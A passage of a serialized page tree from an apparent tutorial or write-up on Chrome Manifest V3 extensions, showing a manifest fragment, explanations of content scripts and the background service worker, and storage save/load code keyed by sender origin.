\"",{"type":33,"tag":128,"props":12709,"children":12710},{"style":437},[12711],{"type":38,"value":12712},"matches",{"type":33,"tag":128,"props":12714,"children":12715},{"style":656},[12716],{"type":38,"value":669},{"type":33,"tag":128,"props":12718,"children":12719},{"style":312},[12720],{"type":38,"value":284},{"type":33,"tag":128,"props":12722,"children":12723},{"style":312},[12724],{"type":38,"value":1466},{"type":33,"tag":128,"props":12726,"children":12727},{"class":130,"line":1202},[12728,12733,12738],{"type":33,"tag":128,"props":12729,"children":12730},{"style":676},[12731],{"type":38,"value":12732}," \"",{"type":33,"tag":128,"props":12734,"children":12735},{"style":140},[12736],{"type":38,"value":12737},"\u003Call_urls>",{"type":33,"tag":128,"props":12739,"children":12740},{"style":676},[12741],{"type":38,"value":836},{"type":33,"tag":128,"props":12743,"children":12744},{"class":130,"line":1214},[12745],{"type":33,"tag":128,"props":12746,"children":12747},{"style":312},[12748],{"type":38,"value":12749}," ],\n",{"type":33,"tag":128,"props":12751,"children":12752},{"class":130,"line":1226},[12753,12757,12762,12766,12770,12774,12779,12783],{"type":33,"tag":128,"props":12754,"children":12755},{"style":656},[12756],{"type":38,"value":12707},{"type":33,"tag":128,"props":12758,"children":12759},{"style":437},[12760],{"type":38,"value":12761},"run_at",{"type":33,"tag":128,"props":12763,"children":12764},{"style":656},[12765],{"type":38,"value":669},{"type":33,"tag":128,"props":12767,"children":12768},{"style":312},[12769],{"type":38,"value":284},{"type":33,"tag":128,"props":12771,"children":12772},{"style":676},[12773],{"type":38,"value":679},{"type":33,"tag":128,"props":12775,"children":12776},{"style":140},[12777],{"type":38,"value":12778},"document_idle",{"type":33,"tag":128,"props":12780,"children":12781},{"style":676},[12782],{"type":38,"value":669},{"type":33,"tag":128,"props":12784,"children":12785},{"style":312},[12786],{"type":38,"value":693},{"type":33,"tag":128,"props":12788,"children":12789},{"class":130,"line":1239},[12790,12794,12798,12802,12806],{"type":33,"tag":128,"props":12791,"children":12792},{"style":656},[12793],{"type":38,"value":12707},{"type":33,"tag":128,"props":12795,"children":12796},{"style":437},[12797],{"type":38,"value":5526},{"type":33,"tag":128,"props":12799,"children":12800},{"style":656},[12801],{"type":38,"value":669},{"type":33,"tag":128,"props":12803,"children":12804},{"style":312},[12805],{"type":38,"value":284},{"type":33,"tag":128,"props":12807,"children":12808},{"style":312},[12809],{"type":38,"value":1466},{"type":33,"tag":128,"props":12811,"children":12812},{"class":130,"line":1251},[12813,12817,12822],{"type":33,"tag":128,"props":12814,"children":12815},{"style":676},[12816],{"type":38,"value":12732},{"type":33,"tag":128,"props":12818,"children":12819},{"style":140},[12820],{"type":38,"value":12821},"contentScript.js",{"type":33,"tag":128,"props":12823,"children":12824},{"style":676},[12825],{"type":38,"value":836},{"type":33,"tag":128,"props":12827,"children":12828},{"class":130,"line":1263},[12829],{"type":33,"tag":128,"props":12830,"children":12831},{"style":312},[12832],{"type":38,"value":12833}," ]\n",{"type":33,"tag":128,"props":12835,"children":12836},{"class":130,"line":1276},[12837],{"type":33,"tag":128,"props":12838,"children":12839},{"style":312},[12840],{"type":38,"value":6760},{"type":33,"tag":128,"props":12842,"children":12843},{"class":130,"line":1288},[12844],{"type":33,"tag":128,"props":12845,"children":12846},{"style":312},[12847],{"type":38,"value":1546},{"type":33,"tag":128,"props":12849,"children":12850},{"class":130,"line":1300},[12851],{"type":33,"tag":128,"props":12852,"children":12853},{"style":312},[12854],{"type":38,"value":854},{"type":33,"tag":239,"props":12856,"children":12857},{},[12858,12868,12878,12888],{"type":33,"tag":243,"props":12859,"children":12860},{},[12861,12866],{"type":33,"tag":105,"props":12862,"children":12864},{"className":12863},[],[12865],{"type":38,"value":12449},{"type":38,"value":12867},": Runs in the background and can listen to events (like network requests, tab creation, etc.).",{"type":33,"tag":243,"props":12869,"children":12870},{},[12871,12876],{"type":33,"tag":105,"props":12872,"children":12874},{"className":12873},[],[12875],{"type":38,"value":12513},{"type":38,"value":12877},": Configures the action for the extension's toolbar icon, which users can click on.",{"type":33,"tag":243,"props":12879,"children":12880},{},[12881,12886],{"type":33,"tag":105,"props":12882,"children":12884},{"className":12883},[],[12885],{"type":38,"value":1453},{"type":38,"value":12887},": Lists the permissions that the extension needs to function properly. These permissions are essential as they allow the extension to access certain browser features.",{"type":33,"tag":243,"props":12889,"children":12890},{},[12891,12896],{"type":33,"tag":105,"props":12892,"children":12894},{"className":12893},[],[12895],{"type":38,"value":12679},{"type":38,"value":12897},": Scripts that run in the context of specific web pages and interact with the page’s DOM.",{"type":33,"tag":88,"props":12899,"children":12901},{"id":12900},"content-scripts",[12902],{"type":38,"value":12903},"Content Scripts",{"type":33,"tag":47,"props":12905,"children":12906},{},[12907],{"type":38,"value":12908},"These are JavaScript files that run on specified pages. Theses files that run in the context of web pages and allow Chrome extensions to interact with a page's DOM. They enable developers to access and modify the content of web pages directly, creating a bridge between the extension and the page the user is visiting.",{"type":33,"tag":88,"props":12910,"children":12912},{"id":12911},"background-service-worker",[12913],{"type":38,"value":12914},"Background Service Worker",{"type":33,"tag":47,"props":12916,"children":12917},{},[12918],{"type":38,"value":12919},"In Chrome extensions that use Manifest Version 3 (MV3), the background service worker replaces the traditional background script. This service worker is a JavaScript file that runs in the background of the browser, managing tasks that don’t require direct user interaction, such as handling events, managing persistent data, and listening for API calls.",{"type":33,"tag":47,"props":12921,"children":12922},{},[12923],{"type":38,"value":12924},"Most of the time, the background script will listen for events and process them to perform actions in the background. In our case, we can see that events are handled and processed to cache information.",{"type":33,"tag":114,"props":12926,"children":12927},{"lang":5526},[12928],{"type":33,"tag":119,"props":12929,"children":12931},{"className":5530,"code":12930,"language":5526,"meta":8,"style":8},"'use strict';\n\n// With background scripts you can communicate with popup\n// and contentScript files.\n// For more information on background script,\n// See https://developer.chrome.com/extensions/background_pages\n\nfunction save(key, value, origin) {\n return new Promise((resolve, reject) => {\n key = key + \"-\" + origin;\n console.log(\"Saving: \", key, value);\n chrome.storage.local.set({ [key]: value }, () => {\n resolve({ message: 'Data saved successfully' })\n })\n })\n}\nfunction load(key, origin) {\n return new Promise((resolve, reject) => {\n key = key + \"-\" + origin;\n console.log(\"Loading: \", key);\n chrome.storage.local.get([key], data => {\n if (data.hasOwnProperty(key) === false) {\n return reject({ message: 'Data not found' });\n }\n console.log(\"Data: \", data[key]);\n resolve(data[key]);\n });\n });\n}\n\nchrome.runtime.onMessage.addListener((request, sender, sendResponse) => {\n new Promise(async () => {\n const sender_origin = new URL(sender.tab.pendingUrl ?? sender.tab.url).origin;\n console.log(\"Sender Origin: \", sender_origin);\n console.log(\"Request: \", request);\n if (request.type === \"SAVE\") {\n save(request.payload.key, request.payload.value, sender_origin)\n .then(response => sendResponse(response))\n .catch(error => sendResponse({ error }));\n } else if (request.type === \"LOAD\") {\n load(request.payload.key, sender_origin)\n .then(response => sendResponse(response))\n .catch(error => sendResponse({ error }));\n }\n })\n return true;\n});\n\n",[12932],{"type":33,"tag":105,"props":12933,"children":12934},{"__ignoreMap":8},[12935,12955,12962,12970,12978,12986,12994,13001,13049,13098,13142,13195,13268,13306,13314,13322,13329,13365,13408,13451,13495,13554,13608,13649,13657,13711,13738,13746,13754,13761,13768,13842,13875,13966,14010,14055,14104,14173,14215,14257,14316,14360,14399,14438,14445,14452,14467],{"type":33,"tag":128,"props":12936,"children":12937},{"class":130,"line":131},[12938,12942,12947,12951],{"type":33,"tag":128,"props":12939,"children":12940},{"style":676},[12941],{"type":38,"value":6040},{"type":33,"tag":128,"props":12943,"children":12944},{"style":140},[12945],{"type":38,"value":12946},"use strict",{"type":33,"tag":128,"props":12948,"children":12949},{"style":676},[12950],{"type":38,"value":6040},{"type":33,"tag":128,"props":12952,"children":12953},{"style":312},[12954],{"type":38,"value":5676},{"type":33,"tag":128,"props":12956,"children":12957},{"class":130,"line":362},[12958],{"type":33,"tag":128,"props":12959,"children":12960},{"emptyLinePlaceholder":896},[12961],{"type":38,"value":899},{"type":33,"tag":128,"props":12963,"children":12964},{"class":130,"line":403},[12965],{"type":33,"tag":128,"props":12966,"children":12967},{"style":5541},[12968],{"type":38,"value":12969},"// With background scripts you can communicate with popup\n",{"type":33,"tag":128,"props":12971,"children":12972},{"class":130,"line":739},[12973],{"type":33,"tag":128,"props":12974,"children":12975},{"style":5541},[12976],{"type":38,"value":12977},"// and contentScript files.\n",{"type":33,"tag":128,"props":12979,"children":12980},{"class":130,"line":765},[12981],{"type":33,"tag":128,"props":12982,"children":12983},{"style":5541},[12984],{"type":38,"value":12985},"// For more information on background script,\n",{"type":33,"tag":128,"props":12987,"children":12988},{"class":130,"line":804},[12989],{"type":33,"tag":128,"props":12990,"children":12991},{"style":5541},[12992],{"type":38,"value":12993},"// See https://developer.chrome.com/extensions/background_pages\n",{"type":33,"tag":128,"props":12995,"children":12996},{"class":130,"line":839},[12997],{"type":33,"tag":128,"props":12998,"children":12999},{"emptyLinePlaceholder":896},[13000],{"type":38,"value":899},{"type":33,"tag":128,"props":13002,"children":13003},{"class":130,"line":848},[13004,13009,13014,13018,13023,13027,13032,13036,13041,13045],{"type":33,"tag":128,"props":13005,"children":13006},{"style":300},[13007],{"type":38,"value":13008},"function",{"type":33,"tag":128,"props":13010,"children":13011},{"style":135},[13012],{"type":38,"value":13013}," save",{"type":33,"tag":128,"props":13015,"children":13016},{"style":312},[13017],{"type":38,"value":5566},{"type":33,"tag":128,"props":13019,"children":13020},{"style":306},[13021],{"type":38,"value":13022},"key",{"type":33,"tag":128,"props":13024,"children":13025},{"style":312},[13026],{"type":38,"value":5584},{"type":33,"tag":128,"props":13028,"children":13029},{"style":306},[13030],{"type":38,"value":13031}," value",{"type":33,"tag":128,"props":13033,"children":13034},{"style":312},[13035],{"type":38,"value":5584},{"type":33,"tag":128,"props":13037,"children":13038},{"style":306},[13039],{"type":38,"value":13040}," origin",{"type":33,"tag":128,"props":13042,"children":13043},{"style":312},[13044],{"type":38,"value":2966},{"type":33,"tag":128,"props":13046,"children":13047},{"style":312},[13048],{"type":38,"value":762},{"type":33,"tag":128,"props":13050,"children":13051},{"class":130,"line":976},[13052,13057,13062,13067,13072,13077,13081,13086,13090,13094],{"type":33,"tag":128,"props":13053,"children":13054},{"style":1576},[13055],{"type":38,"value":13056}," return",{"type":33,"tag":128,"props":13058,"children":13059},{"style":300},[13060],{"type":38,"value":13061}," new",{"type":33,"tag":128,"props":13063,"children":13064},{"style":437},[13065],{"type":38,"value":13066}," Promise",{"type":33,"tag":128,"props":13068,"children":13069},{"style":312},[13070],{"type":38,"value":13071},"((",{"type":33,"tag":128,"props":13073,"children":13074},{"style":306},[13075],{"type":38,"value":13076},"resolve",{"type":33,"tag":128,"props":13078,"children":13079},{"style":312},[13080],{"type":38,"value":5584},{"type":33,"tag":128,"props":13082,"children":13083},{"style":306},[13084],{"type":38,"value":13085}," reject",{"type":33,"tag":128,"props":13087,"children":13088},{"style":312},[13089],{"type":38,"value":2966},{"type":33,"tag":128,"props":13091,"children":13092},{"style":312},[13093],{"type":38,"value":5625},{"type":33,"tag":128,"props":13095,"children":13096},{"style":312},[13097],{"type":38,"value":762},{"type":33,"tag":128,"props":13099,"children":13100},{"class":130,"line":988},[13101,13106,13110,13114,13118,13122,13126,13130,13134,13138],{"type":33,"tag":128,"props":13102,"children":13103},{"style":306},[13104],{"type":38,"value":13105}," key",{"type":33,"tag":128,"props":13107,"children":13108},{"style":312},[13109],{"type":38,"value":5657},{"type":33,"tag":128,"props":13111,"children":13112},{"style":306},[13113],{"type":38,"value":5027},{"type":33,"tag":128,"props":13115,"children":13116},{"style":300},[13117],{"type":38,"value":8297},{"type":33,"tag":128,"props":13119,"children":13120},{"style":676},[13121],{"type":38,"value":679},{"type":33,"tag":128,"props":13123,"children":13124},{"style":140},[13125],{"type":38,"value":907},{"type":33,"tag":128,"props":13127,"children":13128},{"style":676},[13129],{"type":38,"value":669},{"type":33,"tag":128,"props":13131,"children":13132},{"style":300},[13133],{"type":38,"value":8297},{"type":33,"tag":128,"props":13135,"children":13136},{"style":306},[13137],{"type":38,"value":13040},{"type":33,"tag":128,"props":13139,"children":13140},{"style":312},[13141],{"type":38,"value":5676},{"type":33,"tag":128,"props":13143,"children":13144},{"class":130,"line":1001},[13145,13149,13153,13158,13162,13166,13171,13175,13179,13183,13187,13191],{"type":33,"tag":128,"props":13146,"children":13147},{"style":306},[13148],{"type":38,"value":6880},{"type":33,"tag":128,"props":13150,"children":13151},{"style":312},[13152],{"type":38,"value":215},{"type":33,"tag":128,"props":13154,"children":13155},{"style":135},[13156],{"type":38,"value":13157},"log",{"type":33,"tag":128,"props":13159,"children":13160},{"style":312},[13161],{"type":38,"value":5566},{"type":33,"tag":128,"props":13163,"children":13164},{"style":676},[13165],{"type":38,"value":669},{"type":33,"tag":128,"props":13167,"children":13168},{"style":140},[13169],{"type":38,"value":13170},"Saving: ",{"type":33,"tag":128,"props":13172,"children":13173},{"style":676},[13174],{"type":38,"value":669},{"type":33,"tag":128,"props":13176,"children":13177},{"style":312},[13178],{"type":38,"value":5584},{"type":33,"tag":128,"props":13180,"children":13181},{"style":306},[13182],{"type":38,"value":5027},{"type":33,"tag":128,"props":13184,"children":13185},{"style":312},[13186],{"type":38,"value":5584},{"type":33,"tag":128,"props":13188,"children":13189},{"style":306},[13190],{"type":38,"value":13031},{"type":33,"tag":128,"props":13192,"children":13193},{"style":312},[13194],{"type":38,"value":5815},{"type":33,"tag":128,"props":13196,"children":13197},{"class":130,"line":1014},[13198,13203,13207,13211,13215,13220,13224,13229,13233,13237,13241,13246,13250,13255,13260,13264],{"type":33,"tag":128,"props":13199,"children":13200},{"style":306},[13201],{"type":38,"value":13202}," chrome",{"type":33,"tag":128,"props":13204,"children":13205},{"style":312},[13206],{"type":38,"value":215},{"type":33,"tag":128,"props":13208,"children":13209},{"style":306},[13210],{"type":38,"value":12636},{"type":33,"tag":128,"props":13212,"children":13213},{"style":312},[13214],{"type":38,"value":215},{"type":33,"tag":128,"props":13216,"children":13217},{"style":306},[13218],{"type":38,"value":13219},"local",{"type":33,"tag":128,"props":13221,"children":13222},{"style":312},[13223],{"type":38,"value":215},{"type":33,"tag":128,"props":13225,"children":13226},{"style":135},[13227],{"type":38,"value":13228},"set",{"type":33,"tag":128,"props":13230,"children":13231},{"style":312},[13232],{"type":38,"value":5836},{"type":33,"tag":128,"props":13234,"children":13235},{"style":312},[13236],{"type":38,"value":718},{"type":33,"tag":128,"props":13238,"children":13239},{"style":306},[13240],{"type":38,"value":13022},{"type":33,"tag":128,"props":13242,"children":13243},{"style":312},[13244],{"type":38,"value":13245},"]:",{"type":33,"tag":128,"props":13247,"children":13248},{"style":306},[13249],{"type":38,"value":13031},{"type":33,"tag":128,"props":13251,"children":13252},{"style":312},[13253],{"type":38,"value":13254}," },",{"type":33,"tag":128,"props":13256,"children":13257},{"style":312},[13258],{"type":38,"value":13259}," ()",{"type":33,"tag":128,"props":13261,"children":13262},{"style":312},[13263],{"type":38,"value":5625},{"type":33,"tag":128,"props":13265,"children":13266},{"style":312},[13267],{"type":38,"value":762},{"type":33,"tag":128,"props":13269,"children":13270},{"class":130,"line":1026},[13271,13276,13280,13284,13288,13292,13297,13301],{"type":33,"tag":128,"props":13272,"children":13273},{"style":135},[13274],{"type":38,"value":13275}," resolve",{"type":33,"tag":128,"props":13277,"children":13278},{"style":312},[13279],{"type":38,"value":5836},{"type":33,"tag":128,"props":13281,"children":13282},{"style":437},[13283],{"type":38,"value":6730},{"type":33,"tag":128,"props":13285,"children":13286},{"style":312},[13287],{"type":38,"value":284},{"type":33,"tag":128,"props":13289,"children":13290},{"style":676},[13291],{"type":38,"value":6739},{"type":33,"tag":128,"props":13293,"children":13294},{"style":140},[13295],{"type":38,"value":13296},"Data saved successfully",{"type":33,"tag":128,"props":13298,"children":13299},{"style":676},[13300],{"type":38,"value":6040},{"type":33,"tag":128,"props":13302,"children":13303},{"style":312},[13304],{"type":38,"value":13305}," })\n",{"type":33,"tag":128,"props":13307,"children":13308},{"class":130,"line":1038},[13309],{"type":33,"tag":128,"props":13310,"children":13311},{"style":312},[13312],{"type":38,"value":13313}," })\n",{"type":33,"tag":128,"props":13315,"children":13316},{"class":130,"line":1051},[13317],{"type":33,"tag":128,"props":13318,"children":13319},{"style":312},[13320],{"type":38,"value":13321}," })\n",{"type":33,"tag":128,"props":13323,"children":13324},{"class":130,"line":1063},[13325],{"type":33,"tag":128,"props":13326,"children":13327},{"style":312},[13328],{"type":38,"value":854},{"type":33,"tag":128,"props":13330,"children":13331},{"class":130,"line":1076},[13332,13336,13341,13345,13349,13353,13357,13361],{"type":33,"tag":128,"props":13333,"children":13334},{"style":300},[13335],{"type":38,"value":13008},{"type":33,"tag":128,"props":13337,"children":13338},{"style":135},[13339],{"type":38,"value":13340}," load",{"type":33,"tag":128,"props":13342,"children":13343},{"style":312},[13344],{"type":38,"value":5566},{"type":33,"tag":128,"props":13346,"children":13347},{"style":306},[13348],{"type":38,"value":13022},{"type":33,"tag":128,"props":13350,"children":13351},{"style":312},[13352],{"type":38,"value":5584},{"type":33,"tag":128,"props":13354,"children":13355},{"style":306},[13356],{"type":38,"value":13040},{"type":33,"tag":128,"props":13358,"children":13359},{"style":312},[13360],{"type":38,"value":2966},{"type":33,"tag":128,"props":13362,"children":13363},{"style":312},[13364],{"type":38,"value":762},{"type":33,"tag":128,"props":13366,"children":13367},{"class":130,"line":1089},[13368,13372,13376,13380,13384,13388,13392,13396,13400,13404],{"type":33,"tag":128,"props":13369,"children":13370},{"style":1576},[13371],{"type":38,"value":13056},{"type":33,"tag":128,"props":13373,"children":13374},{"style":300},[13375],{"type":38,"value":13061},{"type":33,"tag":128,"props":13377,"children":13378},{"style":437},[13379],{"type":38,"value":13066},{"type":33,"tag":128,"props":13381,"children":13382},{"style":312},[13383],{"type":38,"value":13071},{"type":33,"tag":128,"props":13385,"children":13386},{"style":306},[13387],{"type":38,"value":13076},{"type":33,"tag":128,"props":13389,"children":13390},{"style":312},[13391],{"type":38,"value":5584},{"type":33,"tag":128,"props":13393,"children":13394},{"style":306},[13395],{"type":38,"value":13085},{"type":33,"tag":128,"props":13397,"children":13398},{"style":312},[13399],{"type":38,"value":2966},{"type":33,"tag":128,"props":13401,"children":13402},{"style":312},[13403],{"type":38,"value":5625},{"type":33,"tag":128,"props":13405,"children":13406},{"style":312},[13407],{"type":38,"value":762},{"type":33,"tag":128,"props":13409,"children":13410},{"class":130,"line":1101},[13411,13415,13419,13423,13427,13431,13435,13439,13443,13447],{"type":33,"tag":128,"props":13412,"children":13413},{"style":306},[13414],{"type":38,"value":13105},{"type":33,"tag":128,"props":13416,"children":13417},{"style":312},[13418],{"type":38,"value":5657},{"type":33,"tag":128,"props":13420,"children":13421},{"style":306},[13422],{"type":38,"value":5027},{"type":33,"tag":128,"props":13424,"children":13425},{"style":300},[13426],{"type":38,"value":8297},{"type":33,"tag":128,"props":13428,"children":13429},{"style":676},[13430],{"type":38,"value":679},{"type":33,"tag":128,"props":13432,"children":13433},{"style":140},[13434],{"type":38,"value":907},{"type":33,"tag":128,"props":13436,"children":13437},{"style":676},[13438],{"type":38,"value":669},{"type":33,"tag":128,"props":13440,"children":13441},{"style":300},[13442],{"type":38,"value":8297},{"type":33,"tag":128,"props":13444,"children":13445},{"style":306},[13446],{"type":38,"value":13040},{"type":33,"tag":128,"props":13448,"children":13449},{"style":312},[13450],{"type":38,"value":5676},{"type":33,"tag":128,"props":13452,"children":13453},{"class":130,"line":1114},[13454,13458,13462,13466,13470,13474,13479,13483,13487,13491],{"type":33,"tag":128,"props":13455,"children":13456},{"style":306},[13457],{"type":38,"value":6880},{"type":33,"tag":128,"props":13459,"children":13460},{"style":312},[13461],{"type":38,"value":215},{"type":33,"tag":128,"props":13463,"children":13464},{"style":135},[13465],{"type":38,"value":13157},{"type":33,"tag":128,"props":13467,"children":13468},{"style":312},[13469],{"type":38,"value":5566},{"type":33,"tag":128,"props":13471,"children":13472},{"style":676},[13473],{"type":38,"value":669},{"type":33,"tag":128,"props":13475,"children":13476},{"style":140},[13477],{"type":38,"value":13478},"Loading: ",{"type":33,"tag":128,"props":13480,"children":13481},{"style":676},[13482],{"type":38,"value":669},{"type":33,"tag":128,"props":13484,"children":13485},{"style":312},[13486],{"type":38,"value":5584},{"type":33,"tag":128,"props":13488,"children":13489},{"style":306},[13490],{"type":38,"value":5027},{"type":33,"tag":128,"props":13492,"children":13493},{"style":312},[13494],{"type":38,"value":5815},{"type":33,"tag":128,"props":13496,"children":13497},{"class":130,"line":1127},[13498,13502,13506,13510,13514,13518,13522,13527,13532,13536,13541,13546,13550],{"type":33,"tag":128,"props":13499,"children":13500},{"style":306},[13501],{"type":38,"value":13202},{"type":33,"tag":128,"props":13503,"children":13504},{"style":312},[13505],{"type":38,"value":215},{"type":33,"tag":128,"props":13507,"children":13508},{"style":306},[13509],{"type":38,"value":12636},{"type":33,"tag":128,"props":13511,"children":13512},{"style":312},[13513],{"type":38,"value":215},{"type":33,"tag":128,"props":13515,"children":13516},{"style":306},[13517],{"type":38,"value":13219},{"type":33,"tag":128,"props":13519,"children":13520},{"style":312},[13521],{"type":38,"value":215},{"type":33,"tag":128,"props":13523,"children":13524},{"style":135},[13525],{"type":38,"value":13526},"get",{"type":33,"tag":128,"props":13528,"children":13529},{"style":312},[13530],{"type":38,"value":13531},"([",{"type":33,"tag":128,"props":13533,"children":13534},{"style":306},[13535],{"type":38,"value":13022},{"type":33,"tag":128,"props":13537,"children":13538},{"style":312},[13539],{"type":38,"value":13540},"],",{"type":33,"tag":128,"props":13542,"children":13543},{"style":306},[13544],{"type":38,"value":13545}," data",{"type":33,"tag":128,"props":13547,"children":13548},{"style":312},[13549],{"type":38,"value":5625},{"type":33,"tag":128,"props":13551,"children":13552},{"style":312},[13553],{"type":38,"value":762},{"type":33,"tag":128,"props":13555,"children":13556},{"class":130,"line":1139},[13557,13562,13566,13570,13574,13579,13583,13587,13591,13596,13600,13604],{"type":33,"tag":128,"props":13558,"children":13559},{"style":1576},[13560],{"type":38,"value":13561}," if",{"type":33,"tag":128,"props":13563,"children":13564},{"style":312},[13565],{"type":38,"value":2852},{"type":33,"tag":128,"props":13567,"children":13568},{"style":306},[13569],{"type":38,"value":2815},{"type":33,"tag":128,"props":13571,"children":13572},{"style":312},[13573],{"type":38,"value":215},{"type":33,"tag":128,"props":13575,"children":13576},{"style":135},[13577],{"type":38,"value":13578},"hasOwnProperty",{"type":33,"tag":128,"props":13580,"children":13581},{"style":312},[13582],{"type":38,"value":5566},{"type":33,"tag":128,"props":13584,"children":13585},{"style":306},[13586],{"type":38,"value":13022},{"type":33,"tag":128,"props":13588,"children":13589},{"style":312},[13590],{"type":38,"value":2966},{"type":33,"tag":128,"props":13592,"children":13593},{"style":300},[13594],{"type":38,"value":13595}," ===",{"type":33,"tag":128,"props":13597,"children":13598},{"style":1576},[13599],{"type":38,"value":6721},{"type":33,"tag":128,"props":13601,"children":13602},{"style":312},[13603],{"type":38,"value":2966},{"type":33,"tag":128,"props":13605,"children":13606},{"style":312},[13607],{"type":38,"value":762},{"type":33,"tag":128,"props":13609,"children":13610},{"class":130,"line":1152},[13611,13616,13620,13624,13628,13632,13636,13641,13645],{"type":33,"tag":128,"props":13612,"children":13613},{"style":1576},[13614],{"type":38,"value":13615}," return",{"type":33,"tag":128,"props":13617,"children":13618},{"style":135},[13619],{"type":38,"value":13085},{"type":33,"tag":128,"props":13621,"children":13622},{"style":312},[13623],{"type":38,"value":5836},{"type":33,"tag":128,"props":13625,"children":13626},{"style":437},[13627],{"type":38,"value":6730},{"type":33,"tag":128,"props":13629,"children":13630},{"style":312},[13631],{"type":38,"value":284},{"type":33,"tag":128,"props":13633,"children":13634},{"style":676},[13635],{"type":38,"value":6739},{"type":33,"tag":128,"props":13637,"children":13638},{"style":140},[13639],{"type":38,"value":13640},"Data not found",{"type":33,"tag":128,"props":13642,"children":13643},{"style":676},[13644],{"type":38,"value":6040},{"type":33,"tag":128,"props":13646,"children":13647},{"style":312},[13648],{"type":38,"value":5863},{"type":33,"tag":128,"props":13650,"children":13651},{"class":130,"line":1165},[13652],{"type":33,"tag":128,"props":13653,"children":13654},{"style":312},[13655],{"type":38,"value":13656}," }\n",{"type":33,"tag":128,"props":13658,"children":13659},{"class":130,"line":1177},[13660,13665,13669,13673,13677,13681,13686,13690,13694,13698,13702,13706],{"type":33,"tag":128,"props":13661,"children":13662},{"style":306},[13663],{"type":38,"value":13664}," console",{"type":33,"tag":128,"props":13666,"children":13667},{"style":312},[13668],{"type":38,"value":215},{"type":33,"tag":128,"props":13670,"children":13671},{"style":135},[13672],{"type":38,"value":13157},{"type":33,"tag":128,"props":13674,"children":13675},{"style":312},[13676],{"type":38,"value":5566},{"type":33,"tag":128,"props":13678,"children":13679},{"style":676},[13680],{"type":38,"value":669},{"type":33,"tag":128,"props":13682,"children":13683},{"style":140},[13684],{"type":38,"value":13685},"Data: ",{"type":33,"tag":128,"props":13687,"children":13688},{"style":676},[13689],{"type":38,"value":669},{"type":33,"tag":128,"props":13691,"children":13692},{"style":312},[13693],{"type":38,"value":5584},{"type":33,"tag":128,"props":13695,"children":13696},{"style":306},[13697],{"type":38,"value":13545},{"type":33,"tag":128,"props":13699,"children":13700},{"style":312},[13701],{"type":38,"value":344},{"type":33,"tag":128,"props":13703,"children":13704},{"style":306},[13705],{"type":38,"value":13022},{"type":33,"tag":128,"props":13707,"children":13708},{"style":312},[13709],{"type":38,"value":13710},"]);\n",{"type":33,"tag":128,"props":13712,"children":13713},{"class":130,"line":1189},[13714,13718,13722,13726,13730,13734],{"type":33,"tag":128,"props":13715,"children":13716},{"style":135},[13717],{"type":38,"value":13275},{"type":33,"tag":128,"props":13719,"children":13720},{"style":312},[13721],{"type":38,"value":5566},{"type":33,"tag":128,"props":13723,"children":13724},{"style":306},[13725],{"type":38,"value":2815},{"type":33,"tag":128,"props":13727,"children":13728},{"style":312},[13729],{"type":38,"value":344},{"type":33,"tag":128,"props":13731,"children":13732},{"style":306},[13733],{"type":38,"value":13022},{"type":33,"tag":128,"props":13735,"children":13736},{"style":312},[13737],{"type":38,"value":13710},{"type":33,"tag":128,"props":13739,"children":13740},{"class":130,"line":1202},[13741],{"type":33,"tag":128,"props":13742,"children":13743},{"style":312},[13744],{"type":38,"value":13745}," });\n",{"type":33,"tag":128,"props":13747,"children":13748},{"class":130,"line":1214},[13749],{"type":33,"tag":128,"props":13750,"children":13751},{"style":312},[13752],{"type":38,"value":13753}," });\n",{"type":33,"tag":128,"props":13755,"children":13756},{"class":130,"line":1226},[13757],{"type":33,"tag":128,"props":13758,"children":13759},{"style":312},[13760],{"type":38,"value":854},{"type":33,"tag":128,"props":13762,"children":13763},{"class":130,"line":1239},[13764],{"type":33,"tag":128,"props":13765,"children":13766},{"emptyLinePlaceholder":896},[13767],{"type":38,"value":899},{"type":33,"tag":128,"props":13769,"children":13770},{"class":130,"line":1251},[13771,13776,13780,13785,13789,13794,13798,13803,13807,13812,13816,13821,13825,13830,13834,13838],{"type":33,"tag":128,"props":13772,"children":13773},{"style":306},[13774],{"type":38,"value":13775},"chrome",{"type":33,"tag":128,"props":13777,"children":13778},{"style":312},[13779],{"type":38,"value":215},{"type":33,"tag":128,"props":13781,"children":13782},{"style":306},[13783],{"type":38,"value":13784},"runtime",{"type":33,"tag":128,"props":13786,"children":13787},{"style":312},[13788],{"type":38,"value":215},{"type":33,"tag":128,"props":13790,"children":13791},{"style":306},[13792],{"type":38,"value":13793},"onMessage",{"type":33,"tag":128,"props":13795,"children":13796},{"style":312},[13797],{"type":38,"value":215},{"type":33,"tag":128,"props":13799,"children":13800},{"style":135},[13801],{"type":38,"value":13802},"addListener",{"type":33,"tag":128,"props":13804,"children":13805},{"style":312},[13806],{"type":38,"value":13071},{"type":33,"tag":128,"props":13808,"children":13809},{"style":306},[13810],{"type":38,"value":13811},"request",{"type":33,"tag":128,"props":13813,"children":13814},{"style":312},[13815],{"type":38,"value":5584},{"type":33,"tag":128,"props":13817,"children":13818},{"style":306},[13819],{"type":38,"value":13820}," sender",{"type":33,"tag":128,"props":13822,"children":13823},{"style":312},[13824],{"type":38,"value":5584},{"type":33,"tag":128,"props":13826,"children":13827},{"style":306},[13828],{"type":38,"value":13829}," sendResponse",{"type":33,"tag":128,"props":13831,"children":13832},{"style":312},[13833],{"type":38,"value":2966},{"type":33,"tag":128,"props":13835,"children":13836},{"style":312},[13837],{"type":38,"value":5625},{"type":33,"tag":128,"props":13839,"children":13840},{"style":312},[13841],{"type":38,"value":762},{"type":33,"tag":128,"props":13843,"children":13844},{"class":130,"line":1263},[13845,13850,13854,13858,13863,13867,13871],{"type":33,"tag":128,"props":13846,"children":13847},{"style":300},[13848],{"type":38,"value":13849}," new",{"type":33,"tag":128,"props":13851,"children":13852},{"style":437},[13853],{"type":38,"value":13066},{"type":33,"tag":128,"props":13855,"children":13856},{"style":312},[13857],{"type":38,"value":5566},{"type":33,"tag":128,"props":13859,"children":13860},{"style":300},[13861],{"type":38,"value":13862},"async",{"type":33,"tag":128,"props":13864,"children":13865},{"style":312},[13866],{"type":38,"value":13259},{"type":33,"tag":128,"props":13868,"children":13869},{"style":312},[13870],{"type":38,"value":5625},{"type":33,"tag":128,"props":13872,"children":13873},{"style":312},[13874],{"type":38,"value":762},{"type":33,"tag":128,"props":13876,"children":13877},{"class":130,"line":1276},[13878,13882,13887,13891,13895,13900,13904,13909,13913,13918,13922,13927,13932,13936,13940,13944,13948,13953,13957,13962],{"type":33,"tag":128,"props":13879,"children":13880},{"style":300},[13881],{"type":38,"value":5696},{"type":33,"tag":128,"props":13883,"children":13884},{"style":306},[13885],{"type":38,"value":13886}," 